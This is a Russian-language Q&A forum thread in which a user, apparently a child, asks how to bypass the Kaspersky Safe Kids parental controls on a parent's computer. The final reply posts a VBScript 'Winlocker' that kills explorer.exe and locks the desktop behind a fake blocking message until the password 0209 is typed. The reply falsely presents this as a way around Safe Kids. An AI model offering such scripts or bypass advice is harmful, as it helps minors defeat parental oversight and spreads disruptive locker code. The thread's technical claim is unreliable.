Как обойти kaspersky safe kids на компьютере

gg gg Ученик (138), на голосовании 8 месяцев назад
Голосование за лучший ответ
Адольф Хренсберг Мастер (1051) 9 месяцев назад
Сносом винды
gg ggУченик (138) 9 месяцев назад
Мамин комп
Адольф Хренсберг Мастер (1051) gg gg, тогда сносом касперского
Андрей Пугасиев Знаток (304) 9 месяцев назад
Иди к маме
gg ggУченик (138) 9 месяцев назад
У меня папа контронтролит
алексей й Ученик (113) 6 месяцев назад
я знаю как на винде от 11 до 8 смотрите вставляете этот код в текстовый документ и кактолько вставили туда код сохроняем и выходим и меняем окончание txt на миы и когда на него кликнули на жымаем ок и когда у вас будет заблокано оно замедлит ево ход и он будет блокиравать устройство раз в 20 мин если заблокол перезаходим в аккаунт и сново играем 20 минут когда страшно вписываем пароль 0209

Do
set t=createobject("Wscript.Shell")
set kill = createobject("wscript.shell")
kill.run "taskkill /f /im explorer.exe",0
msgbox"УПС!Ваш windows был заблокирован! Для разблокировки необходим пароль!",64,"Winlocker"
x = inputbox("Чтобы разблокировать ваш windows,вы должны ввести пароль в данное окно.","Winlocker")
if (x = "0209") then
msgbox"Правильный пароль! Ваш windows будет разблокирован!",64,"Winlocker"
t.run "explorer"
exit do
else
msgbox"Неправильный пароль! Попробуйте ещё!",16,"Winlocker"
end if
loop